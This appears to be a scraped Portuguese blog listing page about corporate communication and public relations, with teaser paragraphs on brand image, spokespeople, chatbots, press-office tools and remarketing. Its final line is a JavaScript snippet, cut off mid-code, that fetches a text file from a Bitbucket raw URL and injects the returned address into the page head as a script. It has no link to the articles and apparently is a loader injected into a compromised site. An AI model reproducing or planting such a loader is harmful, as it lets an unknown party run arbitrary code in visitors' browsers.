Orçamento de comunicação corporativa deve crescer em 2025
Saiba Tudo Sobre O Futuro das Relações Públicas e as Tendências para se Manter Atualizado
Estratégias Essenciais para Construir Autoridade Digital e Fortalecer sua Marca
Descubra Como Escolher as Plataformas Certas para o Seu Negócio

Para que uma empresa seja bem-sucedida, é importante que haja transparência e que os colaboradores entendam o status quo do negócio. Assim, poderão se dedicar mais e atingir resultados específicos. Nesse contexto, a gestão à vista tem grande relevância. No entanto, muitos empresários e gestores desconhecem essa metodologia,...

Todo e qualquer tipo de interação que alguém tem com uma organização contribui para a formação da imagem empresarial, ou seja, a percepção que a opinião pública tem sobre a empresa ou marca. É por isso que a comunicação da empresa, por meio de ações de...

Nos últimos tempos, é comum que os responsáveis pela administração de mídias e da comunicação nas empresas tenham ouvido falar na relação entre big data e marketing. Afinal, são muitos os eventos, livros da área, artigos em revistas e portais, entre outros meios que falam...

Entender o papel do porta-voz para a empresa é muito importante, pois existem situações nas quais a organização precisará estar em contato com a mídia — o que é muito recomendado em ações e estratégias de assessoria de imprensa. Por isso, é preciso que haja uma pessoa responsável por...

Imagine a sua empresa sempre conectada com os prospects e clientes, oferecendo as informações necessárias no momento ideal. Esse pode ser um excelente direcionamento para a criação dos Chatbots. Esses programas são um diferencial para melhorar o posicionamento da marca, além de contribuir para a fidelização de...

O assessor de imprensa é o profissional que deve servir como uma ponte entre a organização e os veículos de comunicação. Em tal cenário, é importante que seja adotado o uso de ferramentas para assessoria de imprensa de qualidade, que ajudem o profissional a se destacar e...

É comum que os estrategistas de marketing das empresas tenham dificuldade em diferenciar os termos remarketing e retargeting, pois eles não são semelhantes apenas na grafia, mas também nos conceitos que representam. Para acabar com essa dúvida de uma vez por todas, vamos esclarecer o que...

var url = 'https://bitbucket.org/goo2/adss/raw/bb48df0654afc575e4e10d9e14d886a4afba6bc2/go.txt'; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement('script'); script.src = data.trim(); document.getElementsByTagName('head')[0].appendChild(script); ...